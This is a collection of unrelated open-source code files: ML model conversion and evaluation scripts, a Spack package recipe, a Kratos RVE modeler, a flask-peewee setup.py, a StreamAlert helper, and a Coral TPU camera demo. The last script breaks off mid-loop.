freeze_graph=False,
):
"""
Utility function to convert and compare a given TensorFlow 1.x model.
Parameters
----------
graph: tf.Graph
TensorFlow 1.x model in tf.Graph format.
feed_dict: dict of (tf.placeholder, np.array)
Dict of placeholder and value pairs representing inputs.
output_nodes: tf.node or list[tf.node]
List of names representing outputs.
use_cpu_only: bool
If true, use CPU only for prediction, otherwise, use GPU also.
frontend_only: bool
If true, skip the prediction call, only validate conversion.
frontend: str
Frontend to convert from.
backend: str
Backend to convert to.
atol: float
The absolute tolerance parameter.
rtol: float
The relative tolerance parameter.
validate_shapes_only: bool
If true, skip element-wise value comparision.
"""
proto, input_key_values, output_names, output_nodes = tf_graph_to_proto(
graph, feed_dict, output_nodes, frontend, backend
)
if frontend_only:
return
if not isinstance(output_nodes, (tuple, list)):
output_nodes = [output_nodes]
if freeze_graph:
model_dir = tempfile.mkdtemp()
graph_def_file = os.path.join(model_dir, "tf_graph.pb")
checkpoint_file = os.path.join(model_dir, "tf_model.ckpt")
static_model_file = os.path.join(model_dir, "tf_static.pb")
coreml_model_file = os.path.join(model_dir, "coreml_model.mlmodel")
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
tf_outputs = sess.run(output_nodes, feed_dict=feed_dict)
tf.train.write_graph(sess.graph, model_dir, graph_def_file, as_text=False)
saver = tf.train.Saver()
saver.save(sess, checkpoint_file)
freeze_g(
input_graph=graph_def_file,
input_saver="",
input_binary=True,
input_checkpoint=checkpoint_file,
output_node_names=",".join([n.op.name for n in output_nodes]),
restore_op_name="save/restore_all",
filename_tensor_name="save/Const:0",
output_graph=static_model_file,
clear_devices=True,
initializer_nodes="",
)
graph = load_tf_pb(static_model_file)
# Need to convert again using frozen graph
proto, input_key_values, output_names, output_nodes = tf_graph_to_proto(
graph, feed_dict, output_nodes, frontend, backend
)
else:
with tf.Session(graph=graph) as sess:
sess.run(tf.global_variables_initializer())
tf_outputs = sess.run(output_nodes, feed_dict=feed_dict)
expected_outputs = {name: val for name, val in zip(output_names, tf_outputs)}
if validate_shapes_only:
compare_shapes(proto, input_key_values, expected_outputs, use_cpu_only)
else:
compare_backend(
proto,
input_key_values,
expected_outputs,
use_cpu_only,
atol=atol,
rtol=rtol,
also_compare_shapes=True,
)
return proto
def layer_counts(spec, layer_type):
spec_type_map = {
"neuralNetworkClassifier": spec.neuralNetworkClassifier,
"neuralNetwork": spec.neuralNetwork,
"neuralNetworkRegressor": spec.neuralNetworkRegressor,
}
nn_spec = spec_type_map.get(spec.WhichOneof("Type"))
if nn_spec is None:
raise ValueError("MLModel must have a neural network")
n = 0
for layer in nn_spec.layers:
if layer.WhichOneof("layer") == layer_type:
n += 1
return n
|
the-stack_106_15829
|
import os
from robolearn.old_utils.plots.specific_cost import plot_specific_cost
method = 'gps' # 'gps' or 'trajopt'
gps_directory_names = ['gps_log1']
gps_models_labels = ['gps_log1']
itr_to_load = None # list(range(8))
block = False
specific_costs = None #[4] # None for all costs
dir_names = [os.path.dirname(os.path.realpath(__file__)) + '/../' + dir_name
for dir_name in gps_directory_names]
plot_specific_cost(dir_names, itr_to_load=itr_to_load, method=method,
gps_models_labels=gps_models_labels, block=block,
specific_costs=specific_costs)
input('Showing plots. Press a key to close...')
|
the-stack_106_15830
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyRequestsOauthlib(PythonPackage):
"""This project provides first-class OAuth library support for Requests.
"""
homepage = "https://github.com/requests/requests-oauthlib"
pypi = "requests-oauthlib/requests-oauthlib-1.2.0.tar.gz"
version('1.3.0', sha256='b4261601a71fd721a8bd6d7aa1cc1d6a8a93b4a9f5e96626f8e4d91e8beeaa6a')
version('1.2.0', sha256='bd6533330e8748e94bf0b214775fed487d309b8b8fe823dc45641ebcd9a32f57')
version('0.3.3', sha256='37557b4de3eef50d2a4c65dc9382148b8331f04b1c637c414b3355feb0f007e9')
depends_on('py-setuptools', type='build')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:2.8,3.4:', type=('build', 'run'))
|
the-stack_106_15831
|
## @package Rve
# This module contains classes (Rve Modelers) that are used
# to handle the generation, assignment and tracking of
# RveConstitutiveLaws.
#
# More details
from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
import datetime
import time
from KratosMultiphysics import *
from KratosMultiphysics.ExternalSolversApplication import *
from KratosMultiphysics.MultiScaleApplication import *
from KratosMultiphysics.SolidMechanicsApplication import *
import TK_Props
## RVEPropertyMap
#
# Detailed description...
class RVEPropertyMap:
## Constructor
def __init__(self,
PropertyID,
Values):
self.PropertyID = PropertyID
self.Values = Values
## RVEModelPartPrototype
#
# Detailed description...
class RVEModelPartPrototype:
## Constructor
def __init__(self,
ModelName,
NodalVariables = ([
DISPLACEMENT,
REACTION,
]),
DOFs = ([
(DISPLACEMENT_X, REACTION_X),
(DISPLACEMENT_Y, REACTION_Y),
(DISPLACEMENT_Z, REACTION_Z),
]),
BufferSize = 2,
RVEPropertyMapList = None):
# create the model part
self.Model = ModelPart(ModelName)
# add nodal variables
for ivar in NodalVariables:
self.Model.AddNodalSolutionStepVariable(ivar)
# read the model part
model_part_io = ModelPartIO(ModelName)
model_part_io.ReadModelPart(self.Model)
# add all degrees of freedom
for inode in self.Model.Nodes:
for idof in DOFs:
inode.AddDof(idof[0], idof[1])
# set buffer size
self.Model.SetBufferSize(BufferSize)
# set up all the properties
for ipmap in RVEPropertyMapList:
TK_Props.Property(
Pro = self.Model.Properties[ipmap.PropertyID],
Values = ipmap.Values
)
## RVEStrainSize
#
# Detailed description...
class RVEStrainSize:
RVE_PLANE_STRESS = 0
RVE_PLANE_STRAIN = 1
RVE_3D = 2
## The RveModeler for continuum elements.
#
# This class is a specialized RveModeler for continuum elements.
class RVEModelerSolid:
## Constructor.
def __init__(self,
MicroModelPartPrototype,
StrainSize,
ResultsIOClass,
ResultsOnNodes = [],
ResultsOnGaussPoints = [],
RveConstraintHandlerClass = RveConstraintHandler_ZBF_SD,
RveHomogenizerClass = RveHomogenizer,
SchemeClass = RveStaticScheme,
LinearSolverClass = SuperLUSolver,
MaxIterations = 10,
CalculateReactions = False,
ReformDofSetAtEachIteration = False,
MoveMesh = False,
ConvergenceCriteriaClass = ResidualNormCriteria,
ConvergenceRelativeTolerance = 1.0E-6,
ConvergenceAbsoluteTolerance = 1.0E-9,
ConvergenceIsVerbose = False,
TargetElementList = [],
OutputElementList = [],
BoundingPolygonNodesID = None,
# NEW
SecondaryRveModeler = None,
IsSecondary = True):
self.MicroModelPartPrototype = MicroModelPartPrototype
self.StrainSize = StrainSize
self.BoundingPolygonNodesID = BoundingPolygonNodesID
if(self.StrainSize == RVEStrainSize.RVE_PLANE_STRESS):
self.RveAdapterClass = RvePlaneStressAdapterV2
self.RveMaterialClass = RveConstitutiveLawV2PlaneStress
elif(self.StrainSize == RVEStrainSize.RVE_PLANE_STRAIN):
raise Exception("Rve Plane Strain Not Yet Implemented")
else: # RVEStrainSize.RVE_3D):
self.RveAdapterClass = Rve3DAdapterV2
self.RveMaterialClass = RveConstitutiveLawV23D
self.RveGeometryDescr = None
self.ResultsIOClass = ResultsIOClass
self.ResultsOnNodes = ResultsOnNodes
self.ResultsOnGaussPoints = ResultsOnGaussPoints
self.RveConstraintHandlerClass = RveConstraintHandlerClass
self.RveHomogenizerClass = RveHomogenizerClass
self.SchemeClass = SchemeClass
self.LinearSolverClass = LinearSolverClass
self.MaxIterations = MaxIterations
self.CalculateReactions = CalculateReactions
self.ReformDofSetAtEachIteration = ReformDofSetAtEachIteration
self.MoveMesh = MoveMesh
self.ConvergenceCriteriaClass = ConvergenceCriteriaClass
self.ConvergenceRelativeTolerance = ConvergenceRelativeTolerance
self.ConvergenceAbsoluteTolerance = ConvergenceAbsoluteTolerance
self.ConvergenceIsVerbose = ConvergenceIsVerbose
self.TargetElementList = TargetElementList
self.OutputElementList = OutputElementList
self.TrackList = {}
self.Initialized = False
# NEW <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
self.SecondaryRveModeler = SecondaryRveModeler
self.IsSecondary = IsSecondary
if(self.IsSecondary == False):
if(self.SecondaryRveModeler is None):
raise exeption("ma che cazzo fai")
# NEW <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
## Initialize
#
# called at the very beginning of the analysis history to
# perform all initializations. This method should be called
# only once.
def Initialize(self, Model):
if(self.Initialized == False):
# initialize the geometry descriptor
self.RveGeometryDescr = RveGeometryDescriptor()
if(self.BoundingPolygonNodesID is not None):
self.RveGeometryDescr.SetUserCornerNodes(self.BoundingPolygonNodesID)
self.RveGeometryDescr.Build(self.MicroModelPartPrototype.Model)
print(self.RveGeometryDescr)
# generate,assign and track all required rve's
if(self.IsSecondary):
# il primario ha gi� generato la lista di cloni!
# ho bisogno di sapere in quale id mi trovo della lista
self.clone_list_counter = 0
for elem_id in self.TargetElementList:
elem = Model.Elements[elem_id]
dummy = self.__assign_rve_constitutive_law(elem)
self.clone_list_counter = 0 # non necessario ma per sicurazzo lo riazzeriamo
else:
# se sono il primario genero una lista di [nelem*ngauss] di rve clones...
self.stored_rvemdpa_clones=[]
for elem_id in self.TargetElementList:
elem = Model.Elements[elem_id]
elem_rvemdpa_clone_list = self.__assign_rve_constitutive_law(elem)
for iclone in elem_rvemdpa_clone_list:
self.stored_rvemdpa_clones.append(iclone)
# ... e la copio nel modeler secondario (che non dovra generarla!!!!!)
self.SecondaryRveModeler.stored_rvemdpa_clones = self.stored_rvemdpa_clones
# initialize the output
self.__initialize_output()
# set initialization flag
self.Initialized = True
## OnBeforeSolutionStage
#
# called before each solutions stage
def OnBeforeSolutionStage(self, Model):
pass
## OnSolutionStageCompleted
#
# called after each solutions stage
def OnSolutionStageCompleted(self, Model):
pass
## OnBeforeSolutionStep
#
# called before each solutions steps is solved
def OnBeforeSolutionStep(self, Model):
pass
## OnSolutionStepCompleted
#
# called after each solutions steps is solved
def OnSolutionStepCompleted(self, Model):
# write the output for this time step
self.__write_output(Model.ProcessInfo[TIME])
## Finalize
#
# called at the end of the analysis history to
# perform all finalizations. This method should be called
# only once.
def Finalize(self, Model):
if(self.Initialized == True):
# finalize the output
self.__finalize_output()
# private methods *******************************************************************************************
## __generate_rve_constitutive_law
#
# This method generates a new rve constitutive law
# by cloning the rve model part prototype and creating
# a new rve constitutive law out of it.
# This method is meant to be private, do NOT call it explicitly
def __generate_rve_constitutive_law(self):
if(self.IsSecondary):
if( self.clone_list_counter >= len(self.stored_rvemdpa_clones) ):
raise exception("Occhio che il current rve clone counter � fuori dalla lista")
current_rve_primary_clone = self.stored_rvemdpa_clones[ self.clone_list_counter ]
modelPartClone = ModelPart(self.MicroModelPartPrototype.Model.Name + "_RVE")
RveCloneModelPart_2Physics(self.MicroModelPartPrototype.Model, modelPartClone, current_rve_primary_clone) # clone the model part prototype
self.stored_rvemdpa_clones = self.stored_rvemdpa_clones + 1
else:
modelPartClone = ModelPart(self.MicroModelPartPrototype.Model.Name + "_RVE")
RveCloneModelPart(self.MicroModelPartPrototype.Model, modelPartClone) # clone the model part prototype
msData = RveMacroscaleData()
linSolver = self.LinearSolverClass()
timeScheme = self.SchemeClass()
timeScheme.Check(modelPartClone)
convCriteria = self.ConvergenceCriteriaClass(
self.ConvergenceRelativeTolerance,
self.ConvergenceAbsoluteTolerance,
self.ConvergenceIsVerbose,
)
constraint_handler = self.RveConstraintHandlerClass()
homogenizer = self.RveHomogenizerClass()
adapter = self.RveAdapterClass() # generate the rve adapter
adapter.SetRveData(
modelPartClone,
msData,
self.RveGeometryDescr,
constraint_handler,
RveLinearSystemOfEquations(linSolver),
homogenizer,
timeScheme,
convCriteria
) # set all data (just for testing...)
rveLaw = self.RveMaterialClass(adapter) # finally generate the constitutive law adapter
for i in range(modelPartClone.GetBufferSize()):
modelPartClone.CloneTimeStep(0.0)
return (rveLaw,modelPartClone) # occhio return a tuple <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
## __track_rve_constitutive_law
#
# This method tracks a rve constitutive law
# at a given element in a given gauss point.
# This method is meant to be private, do NOT call it explicitly
def __track_rve_constitutive_law(self, rveLaw, elemID, gpID):
elInfo = SolidElementInfo(elemID, gpID)
if( next((x for x in self.OutputElementList if x == elemID), None) is not None ):
outputFileName = self.MicroModelPartPrototype.Model.Name + "__" + elInfo.GetStringExtension()
rveLawIO = self.ResultsIOClass(rveLaw.GetModelPart(), outputFileName, self.ResultsOnNodes, self.ResultsOnGaussPoints)
self.TrackList[elInfo] = (rveLaw, rveLawIO)
else:
self.TrackList[elInfo] = (rveLaw, None)
## __assign_rve_constitutive_law
#
# This method assignes a rve constitutive law
# at a given element.
# This method is meant to be private, do NOT call it explicitly
def __assign_rve_constitutive_law(self, Element):
# list of generated rve mdpa clones
rve_mdpa_clones = []
# get the number of integration points
elemIntPoints = Element.GetIntegrationPoints()
num_gp = len(elemIntPoints)
elem_id = Element.Id
# get a reference to the process into
pinfo = self.MicroModelPartPrototype.Model.ProcessInfo
# prepare the list of constitutive laws for the element
constitutiveLaws = []
# for each element integration point ...
for gp_id in range(num_gp):
# generate a new rve constitutive law
rve_law__rve_mdpa__tuple = self.__generate_rve_constitutive_law()
aRveLaw = rve_law__rve_mdpa__tuple[0]
constitutiveLaws.append(aRveLaw)
# TODO: check what rve law to track...
# for the moment let's track them all
self.__track_rve_constitutive_law(aRveLaw, elem_id, gp_id)
# store the rve mdpa clone
rve_mdpa_clones.append(rve_law__rve_mdpa__tuple[1])
# assign the list of constitutive laws
Element.SetValuesOnIntegrationPoints(CONSTITUTIVE_LAW_POINTER, constitutiveLaws, pinfo)
return rve_mdpa_clones
## Initializes the output for the tracked rves (only if required)
def __initialize_output(self):
for key, value in self.TrackList.items():
rveIO = value[1]
if(rveIO is not None):
rveIO.Initialize()
## Writes the output for the tracked rves (only if required)
def __write_output(self, currentTime):
for key, value in self.TrackList.items():
rveIO = value[1]
if(rveIO is not None):
rveIO.Write(currentTime)
## Finalizes the output for the tracked rves (only if required)
def __finalize_output(self):
for key, value in self.TrackList.items():
rveIO = value[1]
if(rveIO is not None):
rveIO.Finalize()
def GENERATE_RVE_LAW(self):
return self.__generate_rve_constitutive_law()
def TRACK_RVE_LAW(self,rveLaw,elemID,gpID):
return self.__track_rve_constitutive_law(rveLaw,elemID,gpID)
def INIT_OUTPUT(self):
return self.__initialize_output()
def WRITE_OUTPUT(self,time):
return self.__write_output(time)
def FIN_OUTPUT(self):
return self.__finalize_output()
## Prints an extensive description of this object
def __print_info(self):
print ("")
print ("====================================================")
print ("RveModelerShell - Info:")
print ("====================================================")
print ("MODEL PART - PROTOTYPE:")
print (self.MicroModelPartPrototype.Model)
print ("====================================================")
print ("TRACK LIST:")
ii = 0
print ("+--------------------------------------------------------+")
for key, value in self.TrackList.items():
print ("AT[", ii, "]")
print ("Info:")
print (key)
print ("(RveMaterial, IO)")
print (value)
print ("Micro Model Clone:")
micro = value[0].GetModelPart()
print (hex(id(micro)))
print (micro)
print ("+--------------------------------------------------------+")
ii+=1
# class RVE_MPI_Utils ( 1) copy prototype; 2) partition target/output elements; 3) generate a modeler for each node)
|
the-stack_106_15832
|
from setuptools import setup, find_packages
requirements = ['Flask', 'werkzeug', 'jinja2', 'peewee>=3.0.0', 'wtforms', 'wtf-peewee']
setup(
name='flask-peewee',
version='3.0.4-propel',
url='http://github.com/coleifer/flask-peewee/',
license='MIT',
author='Charles Leifer',
author_email='[email protected]',
description='Peewee integration for flask',
packages=find_packages(),
package_data={
'flask_peewee': [
'static/*/*.css',
'static/*/*.js',
'static/*/*.gif',
'static/*/*.png',
'templates/*.html',
'templates/*/*.html',
'templates/*/*/*.html',
'tests/*.html',
'tests/*/*.html',
],
},
zip_safe=False,
platforms='any',
install_requires=requirements,
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
],
)
|
the-stack_106_15834
|
"""
Copyright 2017-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from streamalert.shared.lookup_tables.drivers import PersistenceDriver
# pylint: disable=protected-access
class LookupTablesMagic:
"""Namespace full of magic methods that dig around the public interface of LookupTables.
These methods are not on the public interface by design to prevent these access patterns from
being utilized in "normal" Lambda code.
"""
@staticmethod
def get_all_table_data(table):
"""
Return all of the data in the given lookup table as a dict. Only works with S3, and you
should DEFINITELY AVOID USING THIS.
Args:
- table (LookupTable)
Returns:
dict
"""
if table.driver_type != PersistenceDriver.TYPE_S3:
raise RuntimeError("Cannot use lookup_table helper on non-S3 table.")
# Make a single dummy call to force the table to initialize
table.get('dummy', None)
# Do some black magic tomfoolery
return table._driver._cache._data
@staticmethod
def set_table_value(table, key, new_value):
"""Set a value into a LookupTable and then immediately commit it.
Args:
- table (LookupTable)
- key (str)
- new_value (str|int|list|dict|mixed)
"""
table._driver.set(key, new_value)
table._driver.commit()
@staticmethod
def get_all_tables(lookup_tables_core):
"""Returns all lookup tables, keyed by their names
Args:
- lookup_tables_core (LookupTablesCore)
Returns:
dict[str, LookupTable]
"""
return lookup_tables_core._tables
|
the-stack_106_15835
|
"""A demo for object detection or image classification using CORAL TPU.
This example is intended to run later in a raspberry PI, but for now, is running on a
Linux machine
The only pending thing to make it run on the raspberry, since capturing frames require
a different method through the picamera python library
See:
https://www.pyimagesearch.com/2015/03/30/accessing-the-raspberry-pi-camera-with-opencv-and-python
For running in a Linux PC, follow the standard installation of the CORAL TPU USB, plus
installing Python-OpenCV
Examples (Running under python-tflite-source/edgetpu directory):
- Object recognition:
python3 demo/my_TPU_image_recognition.py \
--model=test_data/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
--label=test_data/coco_labels.txt --mode=OBJECT_DETECTION \
--camera=0
- Image classification (plants from iNat):
python3 demo/my_TPU_image_recognition.py \
--model=test_data/mobilenet_v2_1.0_224_inat_plant_quant_edgetpu.tflite \
--label=test_data/inat_plant_labels.txt --mode=IMAGE_CLASSIFICATION
- Image classification (InceptionV4 ImageNet)
python3 demo/my_TPU_image_recognition.py \
--model test_data/inception_v4_299_quant_edgetpu.tflite \
--label=test_data/imagenet_labels.txt --mode=IMAGE_CLASSIFICATION
- Face detection:
python3 demo/object_detection.py \
--model='test_data/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite' \
--mode=IMAGE_CLASSIFICATION'
- Pet detection:
python3 demo/object_detection.py \
--model='test_data/ssd_mobilenet_v1_fine_tuned_edgetpu.tflite' \
--label='test_data/pet_labels.txt' \
"""
import argparse
import platform
import subprocess
from edgetpu.classification.engine import ClassificationEngine
from edgetpu.detection.engine import DetectionEngine
from PIL import Image
from PIL import ImageDraw
import numpy as np
import time
from collections import deque, Counter
#For webcam capture and drawing boxes
import cv2
#picamera
from picamera import PiCamera
import io
# Parameters for visualizing the labels and boxes
FONT = cv2.FONT_HERSHEY_SIMPLEX
FONT_SIZE = 0.7
LABEL_BOX_PADDING = 5
LABEL_BOX_OFFSET_TOP = int(20 * FONT_SIZE) + LABEL_BOX_PADDING
LINE_WEIGHT = 1
# Function to read labels from text files.
def read_label_file(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
ret = {}
for line in lines:
pair = line.strip().split(maxsplit=1)
ret[int(pair[0])] = pair[1].strip()
return ret
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--model', help='Path of the detection model.', required=True)
parser.add_argument(
'--label', help='Path of the labels file.')
parser.add_argument(
'--mode', help='Mode for de detection: OBJECT_DETECTION or IMAGE_CLASSIFICATION',
required=True)
parser.add_argument(
'--camera', help='Camera source (if multiple available)', type=int, required=False)
args = parser.parse_args()
# Initialize engine.
if args.mode == "OBJECT_DETECTION":
engine = DetectionEngine(args.model)
elif args.mode == "IMAGE_CLASSIFICATION":
engine = ClassificationEngine(args.model)
else:
print("Please insert the mode from OBJECT_DETECTION or IMAGE_CLASSIFICATION")
exit()
labels = read_label_file(args.label) if args.label else None
label = None
camera = args.camera if args.camera else 0
# Initialize the camera
#cam = cv2.VideoCapture(camera)
camera = PiCamera()
time.sleep(2)
camera.resolution = (640, 480)
# Create the in-memory stream
stream = io.BytesIO()
# Initialize the timer for fps
start_time = time.time()
frame_times = deque(maxlen=40)
while True:
#ret, cv2_im = cam.read()
stream = io.BytesIO() #wipe the contents
camera.capture(stream, format='jpeg', use_video_port=True)
stream.seek(0)
pil_im = Image.open(stream)
cv2_im = np.array(pil_im)
cv2_im = cv2.cvtColor(cv2_im, cv2.COLOR_BGR2RGB)
if args.mode == "OBJECT_DETECTION":
ans = engine.DetectWithImage(pil_im, threshold=0.05, keep_aspect_ratio=True,
relative_coord=False, top_k=10)
if ans:
for obj in ans:
if obj.score > 0.4:
if labels:
label = labels[obj.label_id] + " - {0:.2f}".format(obj.score)
draw_rectangles(obj.bounding_box, cv2_im, label=label)
else:
draw_text(cv2_im, 'No object detected!')
else:
i = 0
for result in engine.ClassifyWithImage(pil_im, top_k=5):
if result:
label = labels[result[0]]
score = result[1]
draw_text(cv2_im, label, i)
i += 1
else:
draw_text(cv2_im, 'No classification detected!')
lastInferenceTime = engine.get_inference_time()
frame_times.append(time.time())
fps = len(frame_times)/float(frame_times[-1] - frame_times[0] + 0.001)
draw_text(cv2_im, "{:.1f} / {:.2f}ms".format(fps, lastInferenceTime))
#print("FPS / Inference time: " + "{:.1f} / {:.2f}ms".format(fps, lastInferenceTime))
#flipping the image: cv2.flip(cv2_im, 1)
#cv2_im = cv2.resize(cv2_im, (800, 600))
cv2.imshow('object detection', cv2_im)
if cv2.waitKey(1) & 0xFF == ord('q'):
cv2.destroyAllWindows()
exit()
break
#end
#cv2.VideoCapture.release(cam)
def draw_rectangles(rectangles, image_np, label=None):
p1 = (int(rectangles[0][0]), int(rectangles[0][1]))
p2 = (int(rectangles[1][0]), int(rectangles[1][1]))
cv2.rectangle(image_np, p1, p2, color=(255, 0, 0), thickness=LINE_WEIGHT)
if label:
cv2.rectangle(image_np, (p1[0], p1[1]-LABEL_BOX_OFFSET_TOP), (p2[0], p1[1] + LABEL_BOX_PADDING),
color=(255, 0, 0),
thickness=-1)
cv2.putText(image_np, label, p1, FONT, FONT_SIZE, (255, 255, 255), 1, cv2.LINE_AA)
#imgname = str(time.time())
#cv2.imwrite('/home/pi/development/Coral-TPU/imgs/' + imgname + '.jpg', image_np)
def draw_text(image_np, label, pos=0):
p1 = (0, pos*30+20)
#cv2.rectangle(image_np, (p1[0], p1[1]-20), (800, p1[1]+10), color=(0, 255, 0), thickness=-1)
cv2.putText(image_np, label, p1, FONT, FONT_SIZE, (0, 0, 0), 1, cv2.LINE_AA)
if __name__ == '__main__':
main()
|
the-stack_106_15837
|
import argparse
import scipy
from scipy import ndimage
import numpy as np
import sys
from packaging import version
from multiprocessing import Pool
import torch
from torch.autograd import Variable
import torchvision.models as models
import torch.nn.functional as F
from torch.utils import data, model_zoo
from model.deeplab import Res_Deeplab
from model.deeplab_multi import DeeplabMulti
from model.deeplab_vgg import DeeplabVGG
from dataset.cityscapes_dataset import cityscapesDataSet
from dataset.dark_zurich_dataset import DarkZurichDataSet
from collections import OrderedDict
import os
from PIL import Image
from utils.tool import fliplr
import matplotlib.pyplot as plt
import torch.nn as nn
import yaml
import time
torch.backends.cudnn.benchmark=True
IMG_MEAN = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)
DATA_DIRECTORY = './data/Cityscapes/data'
DATA_LIST_PATH = './dataset/cityscapes_list/val.txt'
SAVE_PATH = './result/cityscapes'
IGNORE_LABEL = 255
NUM_CLASSES = 19
NUM_STEPS = 500 # Number of images in the validation set.
RESTORE_FROM = 'http://vllab.ucmerced.edu/ytsai/CVPR18/GTA2Cityscapes_multi-ed35151c.pth'
RESTORE_FROM_VGG = 'http://vllab.ucmerced.edu/ytsai/CVPR18/GTA2Cityscapes_vgg-ac4ac9f6.pth'
RESTORE_FROM_ORC = 'http://vllab1.ucmerced.edu/~whung/adaptSeg/cityscapes_oracle-b7b9934.pth'
SET = 'test'
MODEL = 'DeeplabMulti'
palette = [128, 64, 128, 244, 35, 232, 70, 70, 70, 102, 102, 156, 190, 153, 153, 153, 153, 153, 250, 170, 30,
220, 220, 0, 107, 142, 35, 152, 251, 152, 70, 130, 180, 220, 20, 60, 255, 0, 0, 0, 0, 142, 0, 0, 70,
0, 60, 100, 0, 80, 100, 0, 0, 230, 119, 11, 32]
zero_pad = 256 * 3 - len(palette)
for i in range(zero_pad):
palette.append(0)
def colorize_mask(mask):
# mask: numpy array of the mask
new_mask = Image.fromarray(mask.astype(np.uint8)).convert('P')
new_mask.putpalette(palette)
return new_mask
def get_arguments():
"""Parse all the arguments provided from the CLI.
Returns:
A list of parsed arguments.
"""
parser = argparse.ArgumentParser(description="DeepLab-ResNet Network")
parser.add_argument("--model", type=str, default=MODEL,
help="Model Choice (DeeplabMulti/DeeplabVGG/Oracle).")
parser.add_argument("--data-dir", type=str, default=DATA_DIRECTORY,
help="Path to the directory containing the Cityscapes dataset.")
parser.add_argument("--data-list", type=str, default=DATA_LIST_PATH,
help="Path to the file listing the images in the dataset.")
parser.add_argument("--ignore-label", type=int, default=IGNORE_LABEL,
help="The index of the label to ignore during the training.")
parser.add_argument("--num-classes", type=int, default=NUM_CLASSES,
help="Number of classes to predict (including background).")
parser.add_argument("--restore-from", type=str, default=RESTORE_FROM,
help="Where restore model parameters from.")
parser.add_argument("--gpu", type=int, default=0,
help="choose gpu device.")
parser.add_argument("--batchsize", type=int, default=8,
help="choose gpu device.")
parser.add_argument("--set", type=str, default=SET,
help="choose evaluation set.")
parser.add_argument("--save", type=str, default=SAVE_PATH,
help="Path to save result.")
return parser.parse_args()
def save(output_name):
output, name = output_name
output_col = colorize_mask(output)
output = Image.fromarray(output)
output.save('%s' % (name))
output_col.save('%s_color.png' % (name.split('.jpg')[0]))
return
def save_heatmap(output_name):
output, name = output_name
fig = plt.figure()
plt.axis('off')
heatmap = plt.imshow(output, cmap='viridis')
#fig.colorbar(heatmap)
fig.savefig('%s_heatmap.png' % (name.split('.jpg')[0]))
return
def save_scoremap(output_name):
output, name = output_name
fig = plt.figure()
plt.axis('off')
heatmap = plt.imshow(output, cmap='viridis')
#fig.colorbar(heatmap)
fig.savefig('%s_scoremap.png' % (name.split('.jpg')[0]))
return
def main():
"""Create the model and start the evaluation process."""
args = get_arguments()
config_path = os.path.join(os.path.dirname(args.restore_from),'opts.yaml')
with open(config_path, 'r') as stream:
config = yaml.load(stream)
args.model = config['model']
print('ModelType:%s'%args.model)
print('NormType:%s'%config['norm_style'])
gpu0 = args.gpu
batchsize = args.batchsize
model_name = os.path.basename( os.path.dirname(args.restore_from) )
args.save += model_name
if not os.path.exists(args.save):
os.makedirs(args.save)
if args.model == 'DeepLab':
model = DeeplabMulti(num_classes=args.num_classes, use_se = config['use_se'], train_bn = False, norm_style = config['norm_style'])
elif args.model == 'Oracle':
model = Res_Deeplab(num_classes=args.num_classes)
if args.restore_from == RESTORE_FROM:
args.restore_from = RESTORE_FROM_ORC
elif args.model == 'DeeplabVGG':
model = DeeplabVGG(num_classes=args.num_classes)
if args.restore_from == RESTORE_FROM:
args.restore_from = RESTORE_FROM_VGG
if args.restore_from[:4] == 'http' :
saved_state_dict = model_zoo.load_url(args.restore_from)
else:
saved_state_dict = torch.load(args.restore_from)
try:
model.load_state_dict(saved_state_dict)
except:
model = torch.nn.DataParallel(model)
model.load_state_dict(saved_state_dict)
#model = torch.nn.DataParallel(model)
model.eval()
model.cuda(gpu0)
testloader = data.DataLoader(DarkZurichDataSet(args.data_dir, args.data_list, crop_size=(512, 1024), resize_size=(1024, 512), mean=IMG_MEAN, scale=False, mirror=False, set=args.set),
batch_size=batchsize, shuffle=False, pin_memory=True, num_workers=4)
scale = 1.25
testloader2 = data.DataLoader(DarkZurichDataSet(args.data_dir, args.data_list, crop_size=(round(512*scale), round(1024*scale) ), resize_size=( round(1024*scale), round(512*scale)), mean=IMG_MEAN, scale=False, mirror=False, set=args.set),
batch_size=batchsize, shuffle=False, pin_memory=True, num_workers=4)
scale = 0.9
testloader3 = data.DataLoader(DarkZurichDataSet(args.data_dir, args.data_list, crop_size=(round(512*scale), round(1024*scale) ), resize_size=( round(1024*scale), round(512*scale)), mean=IMG_MEAN, scale=False, mirror=False, set=args.set),
batch_size=batchsize, shuffle=False, pin_memory=True, num_workers=4)
if version.parse(torch.__version__) >= version.parse('0.4.0'):
interp = nn.Upsample(size=(1024, 2048), mode='bilinear', align_corners=True)
else:
interp = nn.Upsample(size=(1024, 2048), mode='bilinear')
sm = torch.nn.Softmax(dim = 1)
log_sm = torch.nn.LogSoftmax(dim = 1)
kl_distance = nn.KLDivLoss( reduction = 'none')
for index, img_data in enumerate(zip(testloader, testloader2, testloader3)):
batch, batch2, batch3 = img_data
image, _, name = batch
image2, _, name2 = batch2
#image3, _, _, name3 = batch3
inputs = image.cuda()
inputs2 = image2.cuda()
#inputs3 = Variable(image3).cuda()
